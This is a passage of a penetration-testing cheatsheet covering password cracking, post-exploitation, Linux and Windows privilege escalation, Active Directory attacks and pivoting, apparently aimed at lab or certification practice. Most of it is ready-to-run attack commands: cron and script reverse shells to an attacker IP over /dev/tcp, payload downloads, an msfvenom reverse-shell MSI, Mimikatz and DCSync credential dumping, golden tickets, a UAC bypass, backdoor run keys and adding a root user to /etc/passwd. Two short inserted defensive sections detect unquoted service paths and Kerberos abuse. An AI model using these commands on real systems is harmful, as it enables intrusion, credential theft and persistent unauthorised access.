hashcat -m 1800 hashes.txt rockyou.txt # sha512crypt (Linux /etc/shadow $6$)
hashcat -m 1000 hashes.txt rockyou.txt # NTLM (Windows)
hashcat -m 5600 hashes.txt rockyou.txt # NTLMv2 (captured via Responder)
hashcat -m 13100 hashes.txt rockyou.txt # Kerberoast (TGS ticket)
hashcat -m 18200 hashes.txt rockyou.txt # AS-REP Roasting hash
# Rules-based cracking — applies mutations (capitalise, append numbers etc.)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John the Ripper
john hashes.txt --wordlist=rockyou.txt
john hashes.txt --wordlist=rockyou.txt --rules
john --format=NT hashes.txt --wordlist=rockyou.txt
# Extract hashes from various file types for offline cracking
pdf2john file.pdf > hash.txt
zip2john file.zip > hash.txt
ssh2john id_rsa > hash.txt
keepass2john vault.kdbx > hash.txt
Hash Identification
# hashid — identify hash type from format
hashid 'hash_here'
# Quick reference by length and prefix
# 32 chars → MD5
# 40 chars → SHA1
# 64 chars → SHA256
# $1$ → MD5crypt
# $2a$/$2b$ → bcrypt
# $6$ → sha512crypt
Wordlists
A quick reference for which wordlists to reach for in common scenarios.
Passwords
| Wordlist | Use case |
|---|---|
| /usr/share/wordlists/rockyou.txt | General purpose password cracking — the go-to |
| /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt | Quick spray — top 10k common passwords |
| /usr/share/seclists/Passwords/Default-Credentials/default-passwords.csv | Default credentials for devices and services |
| /usr/share/seclists/Passwords/Leaked-Databases/ | Leaked database wordlists |
Usernames
| Wordlist | Use case |
|---|---|
| /usr/share/seclists/Usernames/Names/names.txt | General username enumeration |
| /usr/share/seclists/Usernames/top-usernames-shortlist.txt | Quick spray — common admin usernames |
| /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt | Large-scale username brute force |
Web Directory Brute Force
| Wordlist | Use case |
|---|---|
| /usr/share/seclists/Discovery/Web-Content/common.txt | Fast general directory scan |
| /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt | Medium thoroughness — good balance |
| /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt | Thorough — slower, more coverage |
| /usr/share/wordlists/dirb/common.txt | Lightweight dirb wordlist |
| /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt | File discovery (not just directories) |
| /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt | Parameter name fuzzing |
Subdomain / DNS Brute Force
| Wordlist | Use case |
|---|---|
| /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | Fast subdomain scan — top 5k |
| /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | Thorough subdomain scan |
| /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt | Alternative large subdomain list |
SNMP Community Strings
| Wordlist | Use case |
|---|---|
| /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt | Brute force SNMP community strings |
Post Exploitation
Situational Awareness
# Linux
id && whoami # current user and group memberships
hostname # machine name
uname -a # kernel version and architecture
cat /etc/os-release # OS name and version
env # all environment variables — look for creds, paths, tokens
ip a # network interfaces and IP addresses
netstat -tulpn # listening and established network connections with PIDs
ss -tulpn # same as netstat but faster and more modern
ps aux # all running processes — look for interesting services running as root
cat /etc/passwd # all local user accounts
cat /etc/hosts # local DNS overrides — reveals internal hostnames
cat /etc/crontab # scheduled tasks — common privesc vector
ls -la /home/ # list home directories — reveals other users on the system
# Windows
whoami # current user
whoami /priv # assigned privileges — look for SeImpersonatePrivilege etc.
whoami /groups # group memberships — look for interesting groups
hostname # machine name
systeminfo # OS version, architecture, patch level, and domain info
net user # list all local user accounts
net localgroup administrators # who has local admin rights
ipconfig /all # network interfaces, IP, DNS, and DHCP info
netstat -ano # active connections and listening ports with PIDs
tasklist # running processes — look for AV, EDR, and interesting services
wmic product get name,version # installed software and versions
File Transfer
# Serve files from your attack machine
python3 -m http.server 80
# Download on Linux target
wget http://10.10.14.5/file.sh
curl http://10.10.14.5/file.sh -o file.sh
# Download on Windows target
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','file.exe')"
iwr http://10.10.14.5/file.exe -OutFile file.exe
# SCP — copy files over SSH
scp file.txt user@10.10.10.1:/tmp/
scp user@10.10.10.1:/etc/passwd ./passwd
# SMB server on attacker (impacket) — useful when HTTP is blocked
python3 /usr/share/impacket/examples/smbserver.py share . -smb2support
# On Windows target:
copy \\10.10.14.5\share\file.exe .
Automated Enumeration Downloads
# LinPEAS — Linux privilege escalation enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# WinPEAS — Windows privilege escalation enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEAS.bat
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe
# LinEnum — additional Linux enumeration script
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Linux Exploit Suggester — maps kernel version to known exploits
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
# PowerUp — Windows privilege escalation via PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
# SharpHound — Active Directory data collection for BloodHound
wget https://github.com/BloodHoundAD/SharpHound/releases/latest/download/SharpHound.exe
# Chisel — TCP tunnelling over HTTP for port forwarding
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz
# Rubeus — Kerberos abuse toolkit
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
# Mimikatz — Windows credential dumping
wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
Credential Hunting
# Linux — search for stored credentials in config and history files
find / -name "*.conf" 2>/dev/null | xargs grep -l "password"
find / -name "*.env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/config
grep -r "password" /var/www/ 2>/dev/null
grep -r "DB_PASS" /var/www/ 2>/dev/null
# Windows — search for credentials in files and registry
dir /s /b *pass* *cred* *vnc* *.config* 2>nul
findstr /si "password" *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon credentials
# Dump Windows credentials with Mimikatz (requires SYSTEM or admin)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # dump plaintext passwords from LSASS
lsadump::sam # dump SAM database hashes
lsadump::secrets # dump LSA secrets
# Dump credentials remotely via impacket
python3 secretsdump.py domain/user:password@10.10.10.1
Database Access
# MySQL — interactive and one-liner access
mysql -u root -p
mysql -u root -p'password' -e "show databases;"
mysql -u root -p -h 10.10.10.1 # remote connection
# MySQL — useful commands once inside
show databases;
use dbname;
show tables;
select * from users;
select user,password from mysql.user; # dump MySQL user hashes
select load_file('/etc/passwd'); # read files (requires FILE privilege)
# MSSQL via impacket
python3 mssqlclient.py domain/user:password@10.10.10.1 -windows-auth
python3 mssqlclient.py user:password@10.10.10.1
# MSSQL — useful commands once inside
SELECT name FROM master.dbo.sysdatabases; # list all databases
USE dbname; SELECT * FROM INFORMATION_SCHEMA.TABLES;
EXEC xp_cmdshell 'whoami'; # RCE if xp_cmdshell is enabled
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; # enable xp_cmdshell
# PostgreSQL
psql -U postgres -h 10.10.10.1
# PostgreSQL — useful commands once inside
\list # list databases
\c dbname # connect to a database
\dt # list tables
SELECT * FROM users;
COPY (SELECT '') TO PROGRAM 'id'; # RCE via COPY TO PROGRAM
Cracking /etc/shadow
# Combine /etc/passwd and /etc/shadow into a single crackable file
unshadow /etc/passwd /etc/shadow > hashes.txt
# Crack with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Identify the hash type and crack with hashcat
hashid '$6$salt$hash...' # $6$ = sha512crypt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt # sha512crypt
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # md5crypt ($1$)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # bcrypt ($2b$)
Persistence
# Linux — add a cron job reverse shell
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" >> /etc/crontab
# Linux — add your SSH public key for persistent access
mkdir ~/.ssh && echo "ssh-rsa AAAA...yourkey..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Windows — add a registry run key to execute on login
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
# Windows — create a scheduled task to run as SYSTEM
schtasks /create /tn "backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru System
Privilege Escalation — Linux
Automated Enumeration
# LinPEAS — comprehensive Linux privesc enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
# LinEnum
chmod +x LinEnum.sh && ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
# Linux Exploit Suggester — maps current kernel to known exploits
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh
# linux-smart-enumeration — level 2 for thorough output
chmod +x lse.sh && ./lse.sh -l 2
SUID / SGID Binaries
# Find all SUID binaries on the system
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find all SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check GTFOBins for how to exploit any binary you find — https://gtfobins.github.io
# Common exploitable SUID binaries:
find . -exec /bin/sh \; -quit # /usr/bin/find
vim -c ':py import os; os.execl("/bin/sh","sh")' # /usr/bin/vim
bash -p # /bin/bash with SUID
python -c 'import os; os.execl("/bin/sh","sh")' # /usr/bin/python
Sudo
# Check what commands you can run with sudo
sudo -l
# Common sudo privesc paths:
sudo vim -c ':!/bin/bash' # vim
sudo find / -exec /bin/bash \; -quit # find
sudo python3 -c 'import os; os.system("/bin/bash")' # python3
sudo less /etc/passwd # less → type !bash
# LD_PRELOAD abuse (if env_keep+=LD_PRELOAD is set in sudo -l)
cat > /tmp/pe.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid(); without it modern gcc rejects the implicit declaration */
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so <any_allowed_sudo_binary>
Cron Jobs
# View all cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# If a cron script is world-writable — append a reverse shell
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" >> /path/to/script.sh
# If a cron uses a relative binary path — PATH hijack
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
Capabilities
# Find binaries with special capabilities assigned
getcap -r / 2>/dev/null
# cap_setuid — allows changing UID to root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Writable /etc/passwd
# Generate a password hash
openssl passwd -1 -salt xyz hacker
# Append a new root user directly to /etc/passwd
echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
Kernel Exploits
# Check the kernel version
uname -r
cat /proc/version
# Well-known kernel exploits by CVE:
# DirtyCow CVE-2016-5195 Linux 2.6.22 < 3.9
# DirtyPipe CVE-2022-0847 Linux 5.8 to 5.16.11
# PwnKit CVE-2021-4034 polkit pkexec (most Linux distros)
# Linux Exploit Suggester maps your kernel version to known exploits
./linux-exploit-suggester.sh | grep -i "high"
Privilege Escalation — Windows
Automated Enumeration
# WinPEAS — comprehensive Windows privesc enumeration
.\winpeas.exe
# PowerUp — checks for common Windows misconfigurations
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt — security-focused host enumeration
.\Seatbelt.exe -group=all
# SharpUp — compiled alternative to PowerUp
.\SharpUp.exe audit
Service Exploits
# Find services that authenticated users can modify
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Find unquoted service paths — drop a binary at the unquoted path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# e.g. path: C:\Program Files\Vulnerable App\service.exe
# Drop payload at: C:\Program.exe or C:\Program Files\Vulnerable.exe
# Modify a weak service binary — replace it with your payload
sc stop <service>
# Replace binary, then:
sc start <service>
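The unquoted service path check above, as an added example (not from the cheatsheet or any Microsoft tool): it parses the `wmic service get name,displayname,pathname,startmode` table and, for each unquoted path with spaces, lists the intermediate files an administrator must keep non-writable. SAMPLE_WMIC is a constructed sample and the function names are this example's own.

```python
# Added example (not from the original cheatsheet): parse the wmic service table shown
# above and report unquoted image paths with spaces, plus the intermediate files Windows
# would try before the real binary (the locations to verify are not user-writable).
import re

# Constructed sample of wmic output (columns separated by two or more spaces)
SAMPLE_WMIC = r"""
Name     DisplayName     PathName                                          StartMode
Spooler  Print Spooler   C:\Windows\System32\spoolsv.exe                   Auto
VulnSvc  Vulnerable App  C:\Program Files\Vulnerable App\service.exe       Auto
SafeSvc  Safe App        "C:\Program Files\Safe App\service.exe" -run      Auto
"""

def unquoted_path_candidates(pathname):
    """For an unquoted image path containing spaces, return the paths CreateProcess
    tries before the real executable; [] when the path is quoted or space-free."""
    p = pathname.strip()
    if p.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)", p, re.IGNORECASE)  # drop arguments after the .exe
    exe = m.group(1) if m else p
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def parse_wmic_services(text):
    """Return (name, pathname) pairs from the 2+-space separated wmic table."""
    rows = [re.split(r"\s{2,}", line.strip()) for line in text.splitlines() if line.strip()]
    header, body = rows[0], rows[1:]
    name_i, path_i = header.index("Name"), header.index("PathName")
    return [(r[name_i], r[path_i]) for r in body if len(r) == len(header)]

def find_unquoted_services(text):
    """Map service name -> hijack-prone paths to lock down (unquoted paths only)."""
    found = {}
    for name, path in parse_wmic_services(text):
        candidates = unquoted_path_candidates(path)
        if candidates:
            found[name] = candidates
    return found
```

The fix on the host side is to quote the path (`sc config <service> binPath= "\"C:\Program Files\Vulnerable App\service.exe\""`) and to confirm with icacls that `C:\` and `C:\Program Files` are not writable by unprivileged users.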
Registry
# AlwaysInstallElevated — installs MSI packages as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both keys = 1, generate a malicious MSI:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
# Check for stored autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s # PuTTY saved creds
Token Impersonation
# Check for impersonation privileges
whoami /priv
# SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege present? Use a potato attack.
# PrintSpoofer (Windows 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
# RoguePotato
.\RoguePotato.exe -r 10.10.14.5 -e "cmd.exe" -l 9999
# JuicyPotato (older Windows versions)
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
UAC Bypass
# Check UAC level
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Pass the Hash
# PSExec — spawn a shell using an NTLM hash (no plaintext password needed)
python3 psexec.py administrator@10.10.10.1 -hashes :NTLM_HASH
# NetExec — validate and use hash across SMB
netexec smb 10.10.10.1 -u administrator -H NTLM_HASH
netexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH # spray a subnet
# Evil-WinRM — WinRM shell using hash
evil-winrm -i 10.10.10.1 -u administrator -H NTLM_HASH
Active Directory
Initial Enumeration
# BloodHound.py — collect AD data from a Linux host using valid domain credentials (no Windows foothold needed)
python3 bloodhound.py -u user -p password -d domain.local -dc 10.10.10.1 -c All
# SharpHound — collect AD data from a Windows foothold
.\SharpHound.exe -c All
# NetExec — AD enumeration over SMB
netexec smb 10.10.10.1 -u user -p password --users
netexec smb 10.10.10.1 -u user -p password --groups
netexec smb 10.10.10.1 -u user -p password --shares
netexec smb 10.10.10.1 -u user -p password --pass-pol # check lockout policy before spraying
# enum4linux-ng — SMB/RPC enumeration
enum4linux-ng -A 10.10.10.1
# ldapdomaindump — dump all AD objects to HTML and JSON files
python3 ldapdomaindump.py -u 'domain\user' -p password 10.10.10.1
Kerberoasting
# Request TGS tickets for accounts with SPNs — crack offline without lockout risk
python3 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request
# PowerView on Windows — export tickets as hashcat-compatible format
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Crack TGS tickets
hashcat -m 13100 tickets.txt rockyou.txt
AS-REP Roasting
# Request AS-REP hashes for accounts with Kerberos pre-auth disabled (no password needed)
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.1 -no-pass
# Crack AS-REP hashes
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Password Spraying
# NetExec — spray one password across all users (check lockout policy first!)
netexec smb 10.10.10.1 -u users.txt -p 'Password123' --continue-on-success
# Kerbrute — Kerberos-based spray (generates fewer failed logon events than SMB)
kerbrute passwordspray -d domain.local --dc 10.10.10.1 users.txt 'Password123'
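Detection for the Kerberoasting, AS-REP roasting and password spraying techniques above, as an added example not taken from the cheatsheet: it runs over a constructed sample of Windows Security events (4769 TGS request, 4768 TGT request, 4771 pre-auth failure) with the RC4 and pre-auth indicators those attacks leave. The thresholds, window and event field names are this example's own assumptions.

```python
# Added example (not from the original cheatsheet): detection logic for the Kerberoasting,
# AS-REP roasting and password-spray activity described above, over constructed events.
from collections import defaultdict

# Constructed sample; field names are this example's own shorthand for the event XML data
SAMPLE_EVENTS = [
    # Kerberoasting pattern: one account pulls RC4 (0x17) TGS tickets for many SPNs in seconds
    *({"id": 4769, "user": "jdoe", "ip": "10.10.14.5", "svc": s, "etype": "0x17", "ts": 100 + i}
      for i, s in enumerate(["MSSQLSvc/sql01", "HTTP/web01", "CIFS/files01", "MSSQLSvc/sql02"])),
    {"id": 4769, "user": "asmith", "ip": "10.1.0.7", "svc": "CIFS/files01", "etype": "0x12", "ts": 105},
    # AS-REP roasting pattern: TGT issued with pre-auth type 0 (none) and RC4
    {"id": 4768, "user": "svc_backup", "ip": "10.10.14.5", "preauth": "0", "etype": "0x17", "ts": 200},
    {"id": 4768, "user": "asmith", "ip": "10.1.0.7", "preauth": "2", "etype": "0x12", "ts": 201},
    # Spray pattern: one source fails pre-auth with 0x18 (bad password) for many accounts
    *({"id": 4771, "user": u, "ip": "10.10.14.5", "status": "0x18", "ts": 300 + i}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])),
    {"id": 4771, "user": "alice", "ip": "10.1.0.9", "status": "0x18", "ts": 310},
]

def _burst(events, group, distinct, threshold, window):
    """Group events by `group`; report groups that reach `threshold` distinct `distinct`
    values inside any `window`-second span (sliding window over sorted timestamps)."""
    by_key = defaultdict(list)
    for e in events:
        by_key[e[group]].append(e)
    hits = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            seen = {e[distinct] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(seen) >= threshold:
                hits[key] = sorted(seen)
                break
    return hits

def kerberoast_suspects(events, min_spns=3, window=300):
    """Accounts requesting RC4 TGS tickets for >= min_spns distinct SPNs within the window."""
    rc4 = [e for e in events if e["id"] == 4769 and e["etype"] == "0x17"]
    return _burst(rc4, "user", "svc", min_spns, window)

def asrep_roast_suspects(events):
    """Accounts that received an RC4 TGT without pre-authentication (pre-auth type 0)."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == "0" and e["etype"] == "0x17"})

def spray_suspects(events, min_users=5, window=300):
    """Source IPs with bad-password pre-auth failures for >= min_users accounts in the window."""
    bad = [e for e in events if e["id"] == 4771 and e.get("status") == "0x18"]
    return _burst(bad, "ip", "user", min_users, window)
```

Feed the functions real events by mapping EventID, TargetUserName, IpAddress, ServiceName, TicketEncryptionType, PreAuthType and Status onto the same keys; RC4 ticket requests are the strongest single signal because AES-only domains should never emit them.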
DCSync Attack
# Dump all domain hashes remotely — requires DA or replication rights
python3 secretsdump.py domain.local/admin:password@10.10.10.1
# Via Mimikatz on a Windows foothold
lsadump::dcsync /domain:domain.local /all /csv
lsadump::dcsync /domain:domain.local /user:krbtgt # just the krbtgt hash
Golden Ticket
# Forge a TGT for any user using the krbtgt hash — survives password resets
# Get krbtgt hash first via DCSync
# Mimikatz — create and inject the golden ticket
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
# Use the ticket with impacket
export KRB5CCNAME=golden.ccache
python3 psexec.py domain.local/administrator@dc.domain.local -k -no-pass
Common AD Misconfigurations
# GenericAll / GenericWrite on a user — reset their password
python3 changepasswd.py domain.local/attacker:password@10.10.10.1 -newpass 'Hacked123!' -altuser victim
# WriteDACL on the domain object — grant yourself DCSync rights
python3 dacledit.py domain.local/user:password -dc-ip 10.10.10.1 -action write \
-rights DCSync -principal attacker -target-dn "DC=domain,DC=local"
# ForceChangePassword — change a user's password without knowing the current one
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force)
Pivoting & Tunnelling
SSH Tunnelling
# Local port forwarding — access an internal service via your local machine
# Reach 192.168.1.10:80 by browsing to localhost:8080
ssh -L 8080:192.168.1.10:80 user@jumphost
# Dynamic port forwarding — create a SOCKS proxy through SSH
ssh -D 1080 user@jumphost
# Then route tools through it with proxychains
# Remote port forwarding — expose your local listener on the remote host
ssh -R 4444:localhost:4444 user@attacker
# Jump through multiple hops in one command
ssh -J user@jumphost user@internal_host
Proxychains
# Add to /etc/proxychains.conf:
# socks5 127.0.0.1 1080
# Route any tool through the proxy
proxychains nmap -sT -Pn 192.168.1.1
proxychains curl http://192.168.1.1
proxychains python3 exploit.py
Chisel
# Fast TCP tunnel over HTTP — useful when SSH isn't available
# Attacker — start the server in reverse mode
./chisel server -p 8080 --reverse
# Target — connect back and create a reverse SOCKS proxy
./chisel client 10.10.14.5:8080 R:socks
# Forward a specific port (e.g. MySQL on the target to your local machine)
./chisel client 10.10.14.5:8080 R:3306:127.0.0.1:3306
Ligolo-ng
# Modern pivoting tool that creates a TUN interface — clean and transparent
# Attacker — start the proxy
./proxy -selfcert
# Target — connect the agent back to the attacker
./agent -connect 10.10.14.5:11601 -ignore-cert
# On attacker — add a route to the internal network
ip route add 192.168.1.0/24 dev ligolo
# Then in the ligolo UI: select session → start tunnel
Netsh (Windows Port Forwarding)
# Forward all connections on a local port to an internal host
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=4444 connectaddress=192.168.1.10
# View all active forwarding rules
netsh interface portproxy show all
# Remove a rule
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=0.0.0.0
Socat
# Forward traffic from one port to a remote host
socat TCP-LISTEN:8080,fork TCP:192.168.1.10:80
# Relay a reverse shell connection to another machine
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444
For SUID/capability binary exploitation, always check GTFOBins. For Windows binary abuse, check LOLBAS.